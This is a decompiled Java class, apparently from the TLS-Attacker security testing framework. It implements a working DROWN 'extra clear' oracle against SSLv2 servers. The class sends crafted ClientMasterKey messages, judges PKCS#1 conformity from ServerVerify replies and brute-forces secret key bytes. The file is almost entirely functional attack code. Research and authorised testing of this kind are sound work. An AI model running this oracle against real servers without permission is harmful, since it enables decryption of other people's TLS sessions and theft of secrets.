/*
 * Decompiled with CFR 0.152.
 */
package de.rub.nds.tlsattacker.attacks.pkcs1.oracles;

import de.rub.nds.modifiablevariable.bytearray.ByteArrayModificationFactory;
import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray;
import de.rub.nds.tlsattacker.attacks.exception.AttackFailedException;
import de.rub.nds.tlsattacker.attacks.impl.drown.ServerVerifyChecker;
import de.rub.nds.tlsattacker.attacks.pkcs1.OracleException;
import de.rub.nds.tlsattacker.attacks.pkcs1.oracles.Pkcs1Oracle;
import de.rub.nds.tlsattacker.core.config.Config;
import de.rub.nds.tlsattacker.core.constants.HandshakeMessageType;
import de.rub.nds.tlsattacker.core.constants.RunningModeType;
import de.rub.nds.tlsattacker.core.constants.SSL2CipherSuite;
import de.rub.nds.tlsattacker.core.protocol.message.SSL2ClientMasterKeyMessage;
import de.rub.nds.tlsattacker.core.protocol.message.SSL2ServerVerifyMessage;
import de.rub.nds.tlsattacker.core.state.State;
import de.rub.nds.tlsattacker.core.workflow.WorkflowExecutor;
import de.rub.nds.tlsattacker.core.workflow.WorkflowExecutorFactory;
import de.rub.nds.tlsattacker.core.workflow.WorkflowTrace;
import de.rub.nds.tlsattacker.core.workflow.WorkflowTraceUtil;
import de.rub.nds.tlsattacker.core.workflow.action.ReceiveAction;
import de.rub.nds.tlsattacker.core.workflow.action.SendAction;
import de.rub.nds.tlsattacker.core.workflow.factory.WorkflowConfigurationFactory;
import de.rub.nds.tlsattacker.core.workflow.factory.WorkflowTraceType;
import java.util.Arrays;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class ExtraClearDrownOracle
extends Pkcs1Oracle {
    private static final Logger LOGGER = LogManager.getLogger();
    private final Config tlsConfig;
    private final SSL2CipherSuite cipherSuite;

    public ExtraClearDrownOracle(Config tlsConfig) {
        this.tlsConfig = tlsConfig;
        this.cipherSuite = tlsConfig.getDefaultSSL2CipherSuite();
        this.blockSize = this.cipherSuite.getBlockSize();
        this.oracleType = Pkcs1Oracle.OracleType.DROWN_EXTRA_CLEAR;
    }

    @Override
    public boolean checkPKCSConformity(byte[] msg) throws OracleException {
        int clearKeyLength = this.cipherSuite.getClearKeyByteNumber() + this.cipherSuite.getSecretKeyByteNumber();
        ConnectionResult conResult = this.connect(msg, clearKeyLength);
        ++this.numberOfQueries;
        if (this.numberOfQueries % 1000L == 0L) {
            LOGGER.info("Number of queries so far: {}", (Object)this.numberOfQueries);
        }
        return conResult.serverVerifyMessage != null && ServerVerifyChecker.check(conResult.serverVerifyMessage, conResult.state.getTlsContext(), true);
    }

    public byte bruteForceKeyByte(byte[] ciphertext, byte[] knownPlaintext) {
        int pos = knownPlaintext.length;
        int clearKeyLength = this.cipherSuite.getClearKeyByteNumber() + this.cipherSuite.getSecretKeyByteNumber() - pos - 1;
        ConnectionResult conResult = null;
        for (int i = 0; i < 5; ++i) {
            conResult = this.connect(ciphertext, clearKeyLength);
            if (conResult.serverVerifyMessage != null) break;
            LOGGER.warn("Invalid Server-Verify message when brute-forcing a key byte");
        }
        if (conResult.serverVerifyMessage == null) {
            throw new AttackFailedException("Too many invalid Server-Verify messages when brute-forcing a key byte");
        }
        byte[] keyCandidate = Arrays.copyOf(knownPlaintext, this.cipherSuite.getSecretKeyByteNumber());
        for (int b = -128; b < 128; ++b) {
            keyCandidate[pos] = (byte)b;
            conResult.state.getTlsContext().setPreMasterSecret(keyCandidate);
            if (!ServerVerifyChecker.check(conResult.serverVerifyMessage, conResult.state.getTlsContext(), true)) continue;
            return (byte)b;
        }
        throw new AttackFailedException("Could not find key byte through brute-force");
    }

    private ConnectionResult connect(byte[] encryptedKey, int clearKeyLength) {
        ConnectionResult result = new ConnectionResult();
        SSL2ClientMasterKeyMessage clientMasterKeyMessage = new SSL2ClientMasterKeyMessage();
        byte[] clearKey = new byte[clearKeyLength];
        ModifiableByteArray clearKeyData = new ModifiableByteArray();
        clearKeyData.setModification(ByteArrayModificationFactory.explicitValue((byte[])clearKey));
        clientMasterKeyMessage.setClearKeyData(clearKeyData);
        ModifiableByteArray encryptedKeyData = new ModifiableByteArray();
        encryptedKeyData.setModification(ByteArrayModificationFactory.explicitValue((byte[])encryptedKey));
        clientMasterKeyMessage.setEncryptedKeyData(encryptedKeyData);
        WorkflowTrace trace = new WorkflowConfigurationFactory(this.tlsConfig).createWorkflowTrace(WorkflowTraceType.SSL2_HELLO, RunningModeType.CLIENT);
        trace.addTlsAction(new SendAction(clientMasterKeyMessage));
        trace.addTlsAction(new ReceiveAction(new SSL2ServerVerifyMessage()));
        result.state = new State(this.tlsConfig, trace);
        WorkflowExecutor workflowExecutor = WorkflowExecutorFactory.createWorkflowExecutor(this.tlsConfig.getWorkflowExecutorType(), result.state);
        workflowExecutor.executeWorkflow();
        result.serverVerifyMessage = (SSL2ServerVerifyMessage)WorkflowTraceUtil.getFirstReceivedMessage(HandshakeMessageType.SSL2_SERVER_VERIFY, trace);
        return result;
    }

    private class ConnectionResult {
        public SSL2ServerVerifyMessage serverVerifyMessage;
        public State state;

        private ConnectionResult() {
        }
    }
}

